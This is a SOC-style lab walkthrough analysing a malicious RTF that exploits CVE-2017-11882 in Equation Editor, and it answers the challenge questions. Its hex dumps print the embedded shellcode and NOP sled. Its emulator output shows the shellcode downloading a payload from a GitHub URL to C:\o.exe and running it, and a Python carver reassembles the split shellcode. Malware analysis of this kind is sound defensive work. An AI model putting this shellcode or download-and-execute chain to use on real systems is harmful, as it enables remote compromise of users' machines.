
Emprisa Maldoc

Challenge Link: Emprisa Maldoc


Scenario:

As a SOC analyst, you were asked to inspect a suspected document a user received in his inbox. One of your colleagues told you that he could not find anything suspicious. However, throwing the document into the sandboxing solution triggered some alerts.

Your job is to investigate the document further and confirm whether it’s malicious or not.


Analysis:

The challenge file is an RTF document, c39-EmprisaMaldoc.rtf. Although the RTF format does not support macros, it does allow OLE (Object Linking and Embedding) 1.0 objects to be embedded, so let's check for embedded OLE objects within the document using rtfdump.

$ rtfdump.py -f O c39-EmprisaMaldoc.rtf 

    7   Level  3      c=    0 p=000000f3 l=    7267 h=    7254;    4678 b=       0 O u=       0 \*\objdata
      Name: b'Equation.3\x00' Size: 3584 md5: 86e11891181069b51cc3d33521af9f1e magic: d0cf11e0

An OLE object named Equation.3 (md5: 86e11891181069b51cc3d33521af9f1e, magic: d0cf11e0) is present; the d0cf11e0 magic identifies an OLE2 Compound File (CFB) container inside the OLE 1.0 wrapper. This object is interesting because of the well-known vulnerability targeting Equation Editor (CVE-2017-11882), a stack-based buffer overflow that allows remote code execution.

Equation Editor is a Microsoft Office component for inserting and modifying equation OLE objects in documents. Because it operates as an out-of-process COM server hosted by eqnedt32.exe, it runs in its own process and accepts commands from other processes. As a result, when the vulnerability is exploited, the attacker's code executes inside the eqnedt32.exe process rather than inside Word itself.

Let's check the contents of this OLE object using rtfdump.py.

rtfdump.py -s 7 -H c39-EmprisaMaldoc.rtf 

00000000: 01 05 00 00 02 00 00 00  0B 00 00 00 45 71 75 61  ............Equa
00000010: 74 69 6F 6E 2E 33 00 00  00 00 00 00 00 00 00 00  tion.3..........
00000020: 0E 00 00 D0 CF 11 E0 A1  B1 1A E1 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 3E 00 03 00 FE  ...........>....
00000040: FF 09 00 06 00 00 00 00  00 00 00 00 00 00 00 01  ................
00000050: 00 00 00 01 00 00 00 00  00 00 00 00 10 00 00 02  ................
00000060: 00 00 00 01 00 00 00 FE  FF FF FF 00 00 00 00 00  ................
00000070: 00 00 00 FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000080: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000090: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000000A0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000000B0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000000C0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000000D0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000000E0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000000F0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000100: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000110: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000120: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000130: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000140: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000150: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000160: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000170: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000180: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000190: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000001A0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000001B0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000001C0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000001D0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000001E0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000001F0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000200: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000210: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000220: FF FF FF FD FF FF FF 04  00 00 00 FE FF FF FF 05  ................
00000230: 00 00 00 FE FF FF FF FE  FF FF FF FF FF FF FF FF  ................
00000240: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000250: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000260: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000270: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000280: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000290: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000002A0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000002B0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000002C0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000002D0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000002E0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000002F0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000300: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000310: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000320: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000330: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000340: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000350: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000360: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000370: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000380: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000390: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000003A0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000003B0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000003C0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000003D0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000003E0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000003F0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000400: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000410: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000420: FF FF FF 52 00 6F 00 6F  00 74 00 20 00 45 00 6E  ...R.o.o.t. .E.n
00000430: 00 74 00 72 00 79 00 00  00 00 00 00 00 00 00 00  .t.r.y..........
00000440: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000450: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000460: 00 00 00 16 00 05 00 FF  FF FF FF FF FF FF FF 02  ................
00000470: 00 00 00 02 CE 02 00 00  00 00 00 C0 00 00 00 00  ................
00000480: 00 00 46 00 00 00 00 00  00 00 00 00 00 00 00 70  ..F............p
00000490: F7 DE CF 00 64 D3 01 03  00 00 00 C0 03 00 00 00  ....d...........
000004A0: 00 00 00 01 00 4F 00 6C  00 65 00 00 00 00 00 00  .....O.l.e......
000004B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000004C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000004D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000004E0: 00 00 00 0A 00 02 01 FF  FF FF FF FF FF FF FF FF  ................
000004F0: FF FF FF 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000500: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000510: 00 00 00 00 00 00 00 00  00 00 00 14 00 00 00 00  ................
00000520: 00 00 00 01 00 43 00 6F  00 6D 00 70 00 4F 00 62  .....C.o.m.p.O.b
00000530: 00 6A 00 00 00 00 00 00  00 00 00 00 00 00 00 00  .j..............
00000540: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000550: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000560: 00 00 00 12 00 02 01 01  00 00 00 03 00 00 00 FF  ................
00000570: FF FF FF 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000580: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000590: 00 00 00 00 00 00 00 01  00 00 00 66 00 00 00 00  ...........f....
000005A0: 00 00 00 03 00 4F 00 62  00 6A 00 49 00 6E 00 66  .....O.b.j.I.n.f
000005B0: 00 6F 00 00 00 00 00 00  00 00 00 00 00 00 00 00  .o..............
000005C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000005D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000005E0: 00 00 00 12 00 02 01 FF  FF FF FF 04 00 00 00 FF  ................
000005F0: FF FF FF 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000600: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000610: 00 00 00 00 00 00 00 03  00 00 00 06 00 00 00 00  ................
00000620: 00 00 00 FE FF FF FF 02  00 00 00 FE FF FF FF FE  ................
00000630: FF FF FF 05 00 00 00 06  00 00 00 07 00 00 00 08  ................
00000640: 00 00 00 09 00 00 00 0A  00 00 00 0B 00 00 00 0C  ................
00000650: 00 00 00 0D 00 00 00 0E  00 00 00 FE FF FF FF FF  ................
00000660: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000670: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000680: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000690: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000006A0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000006B0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000006C0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000006D0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000006E0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000006F0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000700: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000710: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000720: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000730: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000740: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000750: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000760: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000770: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000780: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000790: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000007A0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000007B0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000007C0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000007D0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000007E0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
000007F0: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000800: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000810: FF FF FF FF FF FF FF FF  FF FF FF FF FF FF FF FF  ................
00000820: FF FF FF 01 00 00 02 08  00 00 00 00 00 00 00 00  ................
00000830: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000840: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000850: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000860: 00 00 00 01 00 FE FF 03  0A 00 00 FF FF FF FF 02  ................
00000870: CE 02 00 00 00 00 00 C0  00 00 00 00 00 00 46 17  ..............F.
00000880: 00 00 00 4D 69 63 72 6F  73 6F 66 74 20 45 71 75  ...Microsoft Equ
00000890: 61 74 69 6F 6E 20 33 2E  30 00 0C 00 00 00 44 53  ation 3.0.....DS
000008A0: 20 45 71 75 61 74 69 6F  6E 00 0B 00 00 00 45 71   Equation.....Eq
000008B0: 75 61 74 69 6F 6E 2E 33  00 F4 39 B2 71 00 00 00  uation.3..9.q...
000008C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000008D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000008E0: 00 00 00 00 00 03 00 01  00 00 00 00 00 00 00 00  ................
000008F0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000900: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000910: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000920: 00 00 00 1C 00 00 00 02  00 A8 C3 99 02 00 00 00  ................
00000930: 00 00 00 48 90 5D 00 6C  9C 5B 00 00 00 00 00 03  ...H.].l.[......
00000940: 01 01 03 0A 0A 01 08 5A  5A B8 44 EB 71 12 BA 78  .......ZZ.D.q..x
00000950: 56 34 12 31 D0 8B 08 8B  09 8B 09 66 83 C1 3C FF  V4.1.......f..<.
00000960: E1 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  ................
00000970: 90 90 90 90 90 14 21 40  00 00 00 90 90 90 90 90  ......!@........
00000980: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  ................
00000990: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  ................
000009A0: 90 90 90 33 C9 64 8B 41  30 8B 40 0C 8B 70 14 AD  [email protected]..
000009B0: 96 AD 8B 58 10 8B 53 3C  03 D3 8B 52 78 03 D3 8B  ...X..S<...Rx...
000009C0: 72 20 03 F3 33 C9 41 AD  03 C3 81 38 47 65 74 50  r ..3.A....8GetP
000009D0: 75 F4 81 78 04 72 6F 63  41 75 EB 81 78 08 64 64  u..x.rocAu..x.dd
000009E0: 72 65 75 E2 8B 72 24 03  F3 66 8B 0C 4E 49 8B 72  reu..r$..f..NI.r
000009F0: 1C 03 F3 8B 14 8E 03 D3  33 C9 51 68 2E 65 78 65  ........3.Qh.exe
00000A00: 68 43 3A 5C 6F 53 52 51  68 61 72 79 41 68 4C 69  hC:\oSRQharyAhLi
00000A10: 62 72 68 4C 6F 61 64 54  53 FF D2 83 C4 0C 59 50  brhLoadTS.....YP
00000A20: 51 66 B9 45 00 71 00 75  00 61 00 74 00 69 00 6F  Qf.E.q.u.a.t.i.o
00000A30: 00 6E 00 20 00 4E 00 61  00 74 00 69 00 76 00 65  .n. .N.a.t.i.v.e
00000A40: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000A50: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000A60: 00 00 00 20 00 02 00 FF  FF FF FF FF FF FF FF FF  ... ............
00000A70: FF FF FF 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000A80: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000A90: 00 00 00 00 00 00 00 04  00 00 00 B5 02 00 00 00  ................
00000AA0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000AB0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000AC0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000AD0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000AE0: 00 00 00 00 00 00 00 FF  FF FF FF FF FF FF FF FF  ................
00000AF0: FF FF FF 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B00: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B10: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B20: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B30: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B40: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B50: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B60: 00 00 00 00 00 00 00 FF  FF FF FF FF FF FF FF FF  ................
00000B70: FF FF FF 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B80: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000B90: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000BA0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000BB0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000BC0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000BD0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000BE0: 00 00 00 00 00 00 00 FF  FF FF FF FF FF FF FF FF  ................
00000BF0: FF FF FF 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000C00: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000C10: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000C20: 00 00 00 6C 6C 51 68 6F  6E 2E 64 68 75 72 6C 6D  ...llQhon.dhurlm
00000C30: 54 FF D0 83 C4 10 8B 54  24 04 33 C9 51 66 B9 65  T......T$.3.Qf.e
00000C40: 41 51 33 C9 68 6F 46 69  6C 68 6F 61 64 54 68 6F  AQ3.hoFilhoadTho
00000C50: 77 6E 6C 68 55 52 4C 44  54 50 FF D2 33 C9 8D 54  wnlhURLDTP..3..T
00000C60: 24 24 51 51 52 EB 47 51  FF D0 83 C4 1C 33 C9 5A  $$QQR.GQ.....3.Z
00000C70: 5B 53 52 51 68 78 65 63  61 88 4C 24 03 68 57 69  [SRQhxeca.L$.hWi
00000C80: 6E 45 54 53 FF D2 6A 05  8D 4C 24 18 51 FF D0 83  nETS..j..L$.Q...
00000C90: C4 0C 5A 5B 68 65 73 73  61 83 6C 24 03 61 68 50  ..Z[hessa.l$.ahP
00000CA0: 72 6F 63 68 45 78 69 74  54 53 FF D2 FF D0 E8 B4  rochExitTS......
00000CB0: FF FF FF 68 74 74 70 73  3A 2F 2F 72 61 77 2E 67  ...https://raw.g
00000CC0: 69 74 68 75 62 75 73 65  72 63 6F 6E 74 65 6E 74  ithubusercontent
00000CD0: 2E 63 6F 6D 2F 61 63 63  69 64 65 6E 74 61 6C 72  .com/accidentalr
00000CE0: 65 62 65 6C 2F 61 63 63  69 64 65 6E 74 61 6C 72  ebel/accidentalr
00000CF0: 65 62 65 6C 2E 63 6F 6D  2F 67 68 2D 70 61 67 65  ebel.com/gh-page
00000D00: 73 2F 74 68 65 6D 65 2F  69 6D 61 67 65 73 2F 74  s/theme/images/t
00000D10: 65 73 74 2E 70 6E 67 00  00 00 00 00 00 00 00 00  est.png.........
00000D20: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000D30: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000D40: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000D50: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000D60: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000D70: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000D80: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000D90: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000DA0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000DB0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000DC0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000DD0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000DE0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000DF0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000E00: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000E10: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000E20: 00 00 00 01 05 00 00 00  00 00 00                 ...........

In the dump above there is a run of NOP (0x90) instructions starting at offset 0x961; NOP sleds are commonly used as padding in front of shellcode. The data following the NOP run was therefore extracted, as shown below:

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 

Let's now analyze this shellcode using scdbg.

scdbg.exe /s -1 /f shellcode.bin

Loaded 914 bytes from file shellcode.bin
Detected straight hex encoding input format converting...
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000

401079  GetProcAddress(LoadLibraryA)
401088   error accessing 0x00000069 not mapped

401088   00740069                        add [eax+eax+0x69],dh           step: 2117  foffset: 88
eax=0         ecx=0         edx=6578652e  ebx=6f5c3a43
esp=12fe04    ebp=7c80ae40  esi=7c801d7b  edi=0          EFL 4 P

40108c   006F00                          add [edi+0x0],ch
40108f   6E                              outsb
401090   0020                            add [eax],ah
401092   004E00                          add [esi+0x0],cl

The emulation shows that the shellcode resolves the LoadLibraryA Windows API dynamically and then faults on an access to unmapped memory (0x00000069), so the extracted bytes are not yet a contiguous, runnable shellcode.

Looking back at the rtfdump output, a large run of null bytes (0x00) follows the string Equation Native in the middle of the extracted data. These null bytes, together with the Equation Native string, were removed to obtain the actual shellcode, shown below:

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
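As an added example (my own code, not the challenge author's and not part of rtfdump or scdbg), the following Python parses the OLE 1.0 wrapper shown at the top of the dump, follows the CFB FAT chain of the Root Entry's mini stream so that the directory sector which interrupts the shellcode is skipped rather than cut out by hand, and carves from the NOP sled. The test input is constructed to mimic the dump's layout and is not the real file; all values in it are made up.

```python
import struct

CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")   # the "magic: d0cf11e0" that rtfdump reported
ENDOFCHAIN = 0xFFFFFFFE

def parse_ole1(blob):
    """Split an OLE 1.0 embedded object (MS-OLEDS, the layout at the top of the dump) into fields."""
    version, fmt, n = struct.unpack_from("<III", blob, 0)   # OLEVersion, FormatID, ClassName length
    class_name = blob[12:12 + n].rstrip(b"\0").decode("ascii")
    off = 12 + n
    for _ in range(2):                                  # TopicName and ItemName (both empty here)
        n, = struct.unpack_from("<I", blob, off)
        off += 4 + n
    size, = struct.unpack_from("<I", blob, off)         # NativeDataSize, 0x0E00 = 3584 in the sample
    native = blob[off + 4:off + 4 + size]
    return {"version": version, "format": fmt, "class_name": class_name,
            "native_size": size, "native": native, "is_cfb": native[:8] == CFB_MAGIC}

def read_sector(cfb, idx):
    s = 1 << struct.unpack_from("<H", cfb, 0x1E)[0]     # sector shift in the CFB header: 9 -> 512
    return cfb[(idx + 1) * s:(idx + 2) * s]             # sector 0 starts after the 512-byte header

def fat_chain(cfb, start):
    """Follow a FAT chain from sector `start`; a stream's sectors need not be adjacent."""
    s = 1 << struct.unpack_from("<H", cfb, 0x1E)[0]
    n_fat, = struct.unpack_from("<I", cfb, 0x2C)
    fat = []
    for fat_sect in struct.unpack_from("<109I", cfb, 0x4C)[:n_fat]:   # DIFAT entries in the header
        fat += struct.unpack_from("<%dI" % (s // 4), read_sector(cfb, fat_sect), 0)
    chain = []
    while start != ENDOFCHAIN and start < len(fat) and start not in chain:
        chain.append(start)
        start = fat[start]
    return chain

def root_mini_stream(cfb):
    """Reassemble the Root Entry's stream (the mini stream holding 'Equation Native') via its FAT chain."""
    dir_start, = struct.unpack_from("<I", cfb, 0x30)
    root = read_sector(cfb, dir_start)[:128]            # first 128-byte directory entry
    start, size = struct.unpack_from("<II", root, 0x74) # starting sector, stream size (low dword)
    data = b"".join(read_sector(cfb, idx) for idx in fat_chain(cfb, start))
    return data[:size]

def find_nop_sled(data, min_len=16):
    """Offset of the first run of at least min_len 0x90 bytes, or -1."""
    run = 0
    for i, b in enumerate(data):
        run = run + 1 if b == 0x90 else 0
        if run == min_len:
            return i - min_len + 1
    return -1

def carve_shellcode(ole1_blob):
    obj = parse_ole1(ole1_blob)
    if not obj["is_cfb"]:
        return b""
    stream = root_mini_stream(obj["native"])            # contiguous again: no directory sector inside
    start = find_nop_sled(stream)
    return stream[start:].rstrip(b"\0") if start >= 0 else b""

# Constructed test input, not the real sample: sector 3 = MTEF header + NOP sled + first half, sector 4 = directory, sector 5 = rest
FIRST_HALF = (b"\x90" * 20 + b"<constructed first half>").ljust(504, b"A")
SECOND_HALF = b"<constructed second half>"

def build_sample():
    s = 512
    cfb = bytearray(CFB_MAGIC) + bytearray(s * 7 - 8)  # 512-byte header + sectors 0..5
    struct.pack_into("<HHHH", cfb, 0x18, 0x3E, 3, 0xFFFE, 9)   # v3.62, little-endian, 512-byte sectors
    struct.pack_into("<II", cfb, 0x2C, 1, 1)            # one FAT sector (DIFAT[0] = sector 0); dir at 1
    fat = [0xFFFFFFFD, 4, ENDOFCHAIN, 5, ENDOFCHAIN, ENDOFCHAIN] + [0xFFFFFFFF] * (s // 4 - 6)
    struct.pack_into("<%dI" % (s // 4), cfb, s, *fat)   # directory chain 1 -> 4, mini stream 3 -> 5
    root = bytearray(128)
    struct.pack_into("<II", root, 0x74, 3, s + len(SECOND_HALF))
    cfb[2 * s:2 * s + 128] = root
    cfb[4 * s:5 * s] = bytes.fromhex("030101030a0a0108") + FIRST_HALF      # sector 3
    cfb[5 * s:5 * s + 30] = "Equation Native".encode("utf-16-le")           # sector 4
    cfb[6 * s:6 * s + len(SECOND_HALF)] = SECOND_HALF                       # sector 5
    hdr = struct.pack("<III", 0x501, 2, 11) + b"Equation.3\0" + struct.pack("<III", 0, 0, len(cfb))
    return hdr + bytes(cfb)
```

On the real file the same functions take the decoded \objdata bytes that rtfdump -s 7 prints; the FAT chain shows why the directory entry sits in the middle of the shellcode and why a linear carve needs the manual cut the text describes.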

The cleaned shellcode was then re-analyzed with scdbg.

scdbg.exe /s -1 /f shellcode.bin

Loaded 514 bytes from file shellcode.bin
Detected straight hex encoding input format converting...
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000

401079  GetProcAddress(LoadLibraryA)
401091  LoadLibraryA(urlmon.dll)
4010ba  GetProcAddress(URLDownloadToFileA)
4010c8  URLDownloadToFileA(https://raw.githubusercontent.com/accidentalrebel/accidentalrebel.com/gh-pages/theme/images/test.png, C:\o.exe)
4010e4  GetProcAddress(WinExec)
4010ed  WinExec(C:\o.exe)
40110a  GetProcAddress(ExitProcess)
40110c  ExitProcess(1953069125)

Stepcount 2177

The emulation reveals that the shellcode resolves several Windows APIs dynamically:

  • First it resolves LoadLibraryA and uses it to load urlmon.dll.
  • Next it resolves URLDownloadToFileA, which it calls to download the next-stage file from the GitHub URL and save it as C:\o.exe.
  • It then resolves WinExec, which it calls to execute the downloaded file, and finally resolves ExitProcess to terminate.


Questions:

What is the CVE ID of the exploited vulnerability?

Answer: CVE-2017-11882


To reproduce the exploit in a lab environment and mimic a corporate machine running Microsoft Office 2007, a specific patch should not be installed. Provide the patch number.

Answer: KB4011604
Can be found in the Microsoft documentation.


What is the magic signature in the object data?

Answer: d0cf11e0


What is the name of the spawned process when the document gets opened?

Answer: eqnedt32.exe
The RTF document exploits the Equation Editor vulnerability, and its shellcode runs inside the eqnedt32.exe process, which can also be seen in Any.Run.


What is the full path of the downloaded payload?

Answer: C:\o.exe


Where is the URL used to fetch the payload?

Answer: https://raw.githubusercontent.com/accidentalrebel/accidentalrebel.com/gh-pages/theme/images/test.png


The document contains an obfuscated shellcode. What string was used to cut the shellcode in half? (Two words, space in between)

Answer: Equation Native


What function was used to download the payload file from within the shellcode?

Answer: URLDownloadToFileA


What function was used to execute the downloaded payload file?

Answer: WinExec


Which DLL gets loaded using the "LoadLibraryA" function?

Answer: urlmon.dll


What is the FONT name that gets loaded by the process to trigger the buffer overflow exploit? (3 words)

Answer: Times New Roman
Checking the other stream of the RTF document with rtfdump, we can find the font name.
$ rtfdump.py -s 8 -H c39-EmprisaMaldoc.rtf 
00000000: 01 00 09 00 00 03 9E 00  00 00 02 00 1C 00 00 00  ................
00000010: 00 00 05 00 00 00 09 02  00 00 00 00 05 00 00 00  ................
00000020: 02 01 01 00 00 00 05 00  00 00 01 02 FF FF FF 00  ................
00000030: 05 00 00 00 2E 01 18 00  00 00 05 00 00 00 0B 02  ................
00000040: 00 00 00 00 05 00 00 00  0C 02 A0 01 60 02 12 00  ............`...
00000050: 00 00 26 06 0F 00 1A 00  FF FF FF FF 00 00 10 00  ..&.............
00000060: 00 00 C0 FF FF FF C6 FF  FF FF 20 02 00 00 66 01  .......... ...f.
00000070: 00 00 0B 00 00 00 26 06  0F 00 0C 00 4D 61 74 68  ......&.....Math
00000080: 54 79 70 65 00 00 20 00  1C 00 00 00 FB 02 80 FE  Type.. .........
00000090: 00 00 00 00 00 00 90 01  00 00 00 00 04 02 00 10  ................
000000A0: 54 69 6D 65 73 20 4E 65  77 20 52 6F 6D 61 6E 00  Times New Roman.
